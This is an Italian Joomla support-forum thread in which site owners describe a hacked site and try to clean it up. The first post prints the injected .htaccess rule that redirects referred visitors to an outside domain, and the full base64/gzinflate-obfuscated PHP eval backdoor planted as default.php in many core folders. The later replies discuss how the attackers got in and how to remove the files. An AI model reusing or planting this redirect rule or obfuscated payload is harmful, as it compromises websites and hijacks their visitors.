Tentativo di Hijack

[emy_aeon]

Salve a tutti;

ieri il mio sito è stato down per tutto il pomeriggio:

• ho controllato il db e stava tutto a posto
• ho controllato i permessi delle cartelle ed anche quelli stavano ok
• nessuno degli editor del sito aveva fatto modifiche nel pomeriggio quindi non si capiva cosa era successo.

A senso ho visto, tramite Filezilla, quali erano gli ultimi files che avevano subito modifica.
Era presente il file .htaccess modificato intorno alle 15.00... l'ho aperto con l'editor e ci ho trovato dentro questa sorpresina:

Codice: [Seleziona]

<IfModule mod_rewrite.c>

RewriteEngine On

RewriteBase /

RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)

RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/
$ [NC]

RewriteRule ^.*$ http://darwinawards.fr/wami.html?h=1291289 [L,R]

</IfModule>

mi sono informata sul web ed ho trovato questo forum che ne parla, dice che è un tipo hijacking

http://www.betaarchive.com/forum/viewtopic.php?t=27202

li per li mi sono limitata a cancellare il file .htaccess dalla root del sito e tutto è tornato online e funzionante...

MA questo files me lo vedo replicato un pò in tutte le cartelle (libraries, includes, etc...), sembra quasi che si replica da solo (e lo dicono anche del forum del link postato sopra).. io lo cancello e quello al primo F5 riciccia!
Così ho tagliato la testa al toro, dopo un piccolo backup, ed ho reistallato tutta la piattaforma da zero, scaricandomi ex novo i pacchetti della versione dal sito joomla e sovrascrivendole alle vecchie cartelle.


Peccato che non sia servito nulla!

Malgrado nella root non ci sia più l'ombra di questo .htaccess "infetto" e che il sito sia perfettamente online e funzionante, nelle altre cartelle continua a comparire questo file!!!

Come posso liberarmi definitivamente di questo "ospite indesiderato"?
Qualcuno ha avuto a che fare con questo tipo di hijack?

[emy_aeon]

Mi rispondo da sola, sperando possa essere questa la soluzione definitiva al problema e che possa essere utile a qualcuno.

In attesa di trovare un modo più semplice per sistemare il problema ho provato una soluzione FAI DA TE.

quel file .htaccess con con quel codice indicato sopra è legato ad una pagina php che si chiama default.php (che non è la default.php "di default" - mi si perdonerà la ripetizione- della piattaforma) ma una pagina nuova di zecca che ha questo codice:

Codice: [Seleziona]

<?php eval(gzinflate(base64_decode("DZRFrsRYAgTvMqtueWF6Js3KjOUy02ZkxjLz6ee fIBXKyCzPdPinftuxGtK9/CdLt5IE/yvKfCrKf/4jJR9UXHydrYWTXizCiVl4EjIeT9CexwvcW6FXgrplMg4aOSQLzgLPTB0FcguDgXUFzvKJpvoJhl9BijN29RkdJW4mSBhP7a79VBDm69X7YHYJTjvaytOsNZ2zV12qdvApUY5rHYwryE8I4/z4irrzumxtUHrfalEdUa3oyyM032IjT0h8ggvUzE4M0+tjzaRpg2/dQsJG28YE85QnUVNo1dzrm8L8h3/wycZD6HOcuVe7e42DJ5ZoRR+kGASHbi9Ha4VIXDuzvwQZjwBUCOJ0+cYvcF8e2ZPg+V3ZAxHtj4Em+adNBirH8ctOW4+zceWS9+f6ro4SWLH0xWZ1He8IHkegsQ20ZAJwCrMGTSBF0rPvP2Vjz178feG6PVAJQYL209QLUL8FW1ZsJfKTsJlLjwmnYi4zb4ulv66kbEG4/OaDHiow5L3GNd6TRzfH81FhwZ0jnLmRnLZRrUejcmrvKOTsjbQIc0wPaK36xvJ5S+LY1HV6VvdpUaL1H8MKWkY/7SIQj40sra3qFOT8huIpKznoLG/HTjhwMbpT0Ac4S1tkSyvIJLwMlhGGSYDLgXw4kM4Gr0lbWvb+cBRFGP9jV3lG4fW0Yis8UFJniIPJyqsjqcumhXJo75i8aMsc96ZXWc7aYQf5IzWFXMzHy+3N+3xFQ9TRi1pgFqXmMkcSzXdingavGpnylYiq8Pbid+zSGFVzkSGe2uOd2InE310cU2BYmEOYOMIr01/EXILMdFTszoj0CEYz0sAu1KH3mmusFm6UKfEws8z+gdTKRZZG/GszPNwGcJ7r9Zo4divUR0LUQbI7ZkWCULvbglSsBqc4xTRBNrqHR6zeTINbVefVc31gTcP8MICc4MlnMlsc1ZyAa901XcS5atGHQlKJjAlhyHBLkiRmEo/WLjMxSPfl6gbcFe8xiGZJU/6hBwJ5x7FvSnxIO0KGL/MugUd++J8nn+8z+enEJ8b50MDspxlD46uxOXL5YgbTuX4KhfP6Ldtenkwh41D6mNnUantTKPlW6M5cMu1adVs1vWW01KS2l4JHBPvne9NN/1oZ249b/r5o03b8FcBOohbdL0cRYbwtrZELhPtzJ8AZ0rcTrMXjDIvLW/NQYRJG8PKMXMO70KpMfXF04SbMQyPStB1D5ZawQa0GOxz3Z05z1V3aiWpq37LaKE+7MxvrYqmhSIk1PArsp0Tmbh2QlFcxmQICDQt1E7K3o/RyYddS4hJM79fcAF2bfMxRSc3cli62zQbb5De617Dgw6qJt4N1kVu3qEb7+x3L2sGuI4iNJ6eKSMRaTNdb9A48dfwQcFG6olNRSehezblXukyzeWOl3yw3K+A0CIC+827MT0qRT0LCRUfX/WajWUxTmI8+cuOEeqji2fGLsHsBJ3D48hHN8dIWrvISYeJFhLKzMSzibSgpdjJg6nlkzjwd+8cc72cz1KDGL60Onp6ilEShKn729/MHKmy/AMGltaNQ3RWf0/pSfUm+huFig1K4esscCIeGg3VNuKBJZvvnP7Gt6/boTdKsYpbywnkQaQCISmAR12/d7zNE7TUvJddQ03WzDUZ1IMB90b8jY8b2OpWmyeFWs8ayuWUdvV6F7ER+pV0+ZW/HsxYY30DKybVuOwpwg7j9DQbeiA9USKDPqTs8KE7Y54qOsky0Kbk7U+1+t/qAxP6Tg60f8WMP2FJiDWVUwdmCebI351pnsceQvIbvWCQLqZraDhTT/XT6UI0idCjU1wGFtpiYwESvTzXMl0P1cw+0ATLH7+FUIKSyKnVs+ahxN4i4sb1t1iag8QuidgxP9AqZlPdf+xwyusFCgXt6AdnMvwfKROXTybjUptOE9LVv9x4kMl7Mu8117uSNne08rG0z/l4RJ8tRmQrJoCYG5BQu0AMFUOfs+sF7a87jJ/tm5eto/7BgimAYBobhD/yff//997//Bw=="))); ?>

questi 2 file ricicciano sempre in coppia così,  armata di santa pazienza mi sono messa a scovare questi due files IN OGNI CARTELLA ed a cancellarli MANUALMENTE (ovviamente stando attenta a non cancellare le VERE pagine default.php dei moduli o dei templates), li ho trovati nelle seguente cartelle:

• plugins
• modules
• libraries
• language
• includes
• components
• cli
• cache

Li ho cancellati entrambi e sembra non siano più presenti.
FORSE SI E' RISOLTO?
Resto in attesa...

[mau_develop]

http://www.joomla.it/notizie/6983-la-vera-sicurezza-per-il-tuo-sito-joomla-e-il-tuo-atteggiamento.html

[biv2533]

Sono nella stessa condizione, ovvero ho scoperto tra il 29 sera e il 30 gennaio che molti dei siti che manutengo sono stati bucati con il sistema del mod rewrite sul file htaccess

Per quello che vale riporto quello che ho trovato, ovvero una decina circa di files .htaccess in giro nella varie cartelle di sistema di joomla spesso accompagnati da un file default.php codificato con la funzione php eval

Se si sistema quello piu' evidente nella radice del sito, pare che tuto funzioni, in realta ci sono ancora una sacco di chiamate ai vari siti linkati con i sistemi sovraesposti.

Bisogna pulire tutto e verificare anche i files javascript, molti di essi hanno due righe sopra al file vero e proprio con una funzione document write e relativo redirect.

E' da questa mattina che si sto sbattendo la testa, ma il problema e' che non ho capito da dove e come sono entrati, quindi si corre il rischio di dover rifare tutto fra qualche giorno.
Non mi hanno bucato solo i siti dinamici, ma anche quelli statici, quindi non mi sentirei di dare la colpa ad una vulnerabilita' di qualche componente di joomla, anzi.
Inoltre non hanno attaccato solo un provider ma diversi.

Se qualcuno ha qualche notizia e' ben accetta.

 

[mau_develop]

http://www.joomla.it/notizie/6983-la-vera-sicurezza-per-il-tuo-sito-joomla-e-il-tuo-atteggiamento.html

[biv2533]

Svuota quella clipboard ogni tanto altrimenti incolli sempre lo stesso messaggio...
Avevo già letto il post che peraltro condivido e approvo. Quasi tutte le misure preventive elencate sono da me utilizzate.
Come dicevo peró joomla non ne ha colpa secondo la mia opinione in quanto ho dovuto sisemare anche diversi siti statici.
Lo script malevolo peró riconosce il framework e installa i suoi files nelle directory di sistema importanti di joomla.

[mau_develop]

quindi non hai problemi, basta che avvisi l'hoster e ripristini i backup..

[biv2533]

Il problema ce l'ho, nel senso che non avendo capito da dove sono entrati me lo ritrovo di sicuro e infatti stamattina siamo daccapo.

L'hoster non e' uno solo ma sono 3 o 4 e i siti infettati piu' di 20.
Laddove c'erano gli script malevoli veri e propri ovvero nelle pagine di redirect, sono stati bloccati dai relativi provider, di fatto si crea un loop con continue ricerche che rendono i siti con il mod rewrite attivo apparentemente come non disponibili.

Mi sono fatto uno script php per la cancellazione dei file htaccess e default.php incriminati e in effetti adesso vado un pelo meglio.
E' stato hackerato anche un semplice sito di due pagine html e un paio di files css, assolutamente statico e non dinamico, quindi il probelma non e' joomla.

Mi viene il sospetto che possa essere il mio pc, ovvero qualcosa che legga il file xml di FileZilla e si sia impossessato di user e pwd, difficile, ma sicuramente non impossibile.
Sto scansionando il pc con diversi antivirus e anti malware

[mau_develop]

Avevo già letto il post che peraltro condivido e approvo
----------------------------------------------------------------------------
...allora... hai già letto il post quindi desumo tu non sia in una "condizione di vunerabilità".

Come dicevo peró joomla non ne ha colpa secondo la mia opinione
-----------------------------------------------------------------
...quì lo confermi.....

nel senso che non avendo capito da dove sono entrati
-------------------------------------------------------------------------
... se non sono passati da joomla sono passati dal server che non è tuo... quindi che vuoi fare?

Mi viene il sospetto che possa essere il mio pc
---------------------------------------------------------------
questo è scritto in tutti i post di qs sezione... e credo anche nell'articolo

[mickeymouseone]

Ragazzi io ho lo stesso problema, all'inizio mi hanno modificato solo l'.htpaccess ed è bastato incollarlo via ftp da un backup per risolvere il tutto e ripristinare il sito. Anche io mi sono ritrovato a cancellare i default.php ma quello che mi chiedo è:


come cavolo fanno a inserire nel mio sito il file default.php e .htaccess che ho cambiato tutte le password?


oltre la pagina con i consigli che già seguo, c'è un modo per bloccare questa cosa? mi pare che abbiamo quasi tutti questo problema e moltissimi siti joomla sono attaccati da hacker!


io non ho costruito un sito per rimanere ogni giorno a cambiare l'.htaccess e vorrei sentirmi sicuro che il mio sito funzioni 


cosa si fa?

[mau_develop]

moltissimi siti joomla sono attaccati da hacker!
----------------------------------------------------------------------
1) Moltissime persone non mantengono aggiornato joomla
2) Qualche servizio è meno sicuro di altri
3) Qualsiasi Joomla che viene anche rasato a 0 può essere tranquillamente ripristinato con un backup
4) Far qualcosa a posteriori non sempre è possibile se uno non è più che pratico.
5) Quì ci si occupa di joomla, server e virus su macchine sono altro
6) E' già stato più volte spiegato che andare alla ricerca del malware non ha senso se tranquillamente puoi sovrascrivere con files puliti

7) ... non c'è più nulla da dire....

[mickeymouseone]

M_W_C io ti ringrazio ma hai detto cose che già sappiamo, il problema è come risolverle? visto che il backup non serve a nulla perchè un minuto dopo potrebbero rifarlo; allora è piu' conveniente fare come ho fatto io e quindi sostituire il file hackerati via ftp!

Ma bisogna sempre rimanere a guardare il sito con la paura che venga hackerato e sostituendo i files? anche ogni due giorni?


Non esiste un componente, un modo per evitare che l'hacker inserisca il file nel sito?


Grazie

[mau_develop]

non credo di aver detto cose che già sai se ancora insisti... se passano dal server che componente vuoi? Se ti becchi un virus e ti auto inietti che componente vuoi?  se hai qualcosa di non aggiornato che componente vuoi?
...mazza se siete duri!

[mickeymouseone]

Non serviva arrabbiarsi, solo che dopo aver visto la guida io ho:


- joomla 2.5 sempre aggiornato all'ultima versione (2.5.;
- tutte le versioni dei componenti aggiornate;
- non ho nessun componente della lista sospetta;
- ho nascosto l'accesso amministrazione;
- ho cambiato password e nome utente;
- faccio spesso backup con akeeba;
- ho cancellato tutti i files infetti;


ma nonostante ciò mi sn entrati virus!

[giovi]

E mo mi ci metto anch'io! mickey ma MWC te l'ha già detto qui:

[...]se passano dal server[...]

deve ripetertelo in qualche altra lingua?

in più ti ha anche fatto capire (più tra le righe, ma anche esplicitamente) che potresti aver preso un virus che fa da "porta" a tutti gli attacchi. in questo caso altro non puoi fare che trovare il codice malevolo (scansione antivirus?) e provare a recuperare il file.

[mickeymouseone]

quindi dovrei aprire file per file per scoprire l'errore? prima ho cancellato tutto e adesso sono entrato nel sito e ho un altro virus


con la versione 1.5 non mi è mai successo nulla di tutto ciò! anche se ripristinassi il sito con un backup, un minuto dopo, potrei avere la stessa probabilità di attacco di adesso?


perdonatemi ma non sono molto afferrato in materia!


grazie

[tomtomeight]

Prima di cercare di pulire il sito devi pulire il tuo pc altrimenti perdi solo tempo. Come pulire il tuo pc dai virus non è argomento di questa sezione e di questo forum.

[biv2533]

con la versione 1.5 non mi è mai successo nulla di tutto ciò! anche se ripristinassi il sito con un backup, un minuto dopo, potrei avere la stessa probabilità di attacco di adesso?

Ciao
come dicevo in un mio precedente post non e' questione solo di joomla, ma e' piu' probabile una intrusione da parte del hoster (anche se non lo ammettera' mai per ovvi motivi).

Le versione piu' aggiornati di joomla sono chiaramente da preferire, ma il il malware riconosce l'ambiente nel quale gira e installa .htaccess e default.php nel core di joomla.
Siccome come dicevo purtroppo ne ho avuti diversi di siti infettati posso affermare che il malware si comporta diversamente a seconda del tipo di instalazione di joomla trovato.

Nel caso di joomla che e' quello che ci interessa qui va d intaccare le directory gia' elencate ad inizio post e anche molte sotto directory
ad esempio non solo :
components/
ma anche:
components/com_content
components/com_news_feeds
ecc.
stessa cosa per plugins, modules, includes, ecc.

Concordo che non si riesca probabilmente a scoprire dove e come sia entrato e che per un utente con un solo sito convenga potare (ovvero cancellare tutto e riscrivere) e ripristinare un backup sicuro, ma nel mio caso sarebbe impossibile da fare, considerando che l'infezione continua, non su tutti i siti infettati per fortuna, anche nei giorni successivi.

Ho optato quindi per una rimozione chirurgica tramite script in php da lanciare sul server.
Ci mette qualche secondo e pare funzionare.

Non ho lavorato su una funzione recursiva che mi cercasse i files default.php perche' fanno parte del core joomla specialmente quelli dentro alle dir tmpl e nemmeno cercando i files htaccess in quanto alcuni potrebbero essere messi appositamente in alcune aree riservate dei vari siti.

Quindi ho elencato tutto a mano (un lavoro da certosino) con un semplice unlink senza alcun controllo, tanto se il file non c'e' restituisce un errore, ma non muore nessuno.

Se qualcuno lo vuole e le policy del forum lo permettono lo pubblico qui. (il codice e' visionabile per scoprire eventuali errori).
Altrimenti, passo in ascolto e vi auguro buona giornata.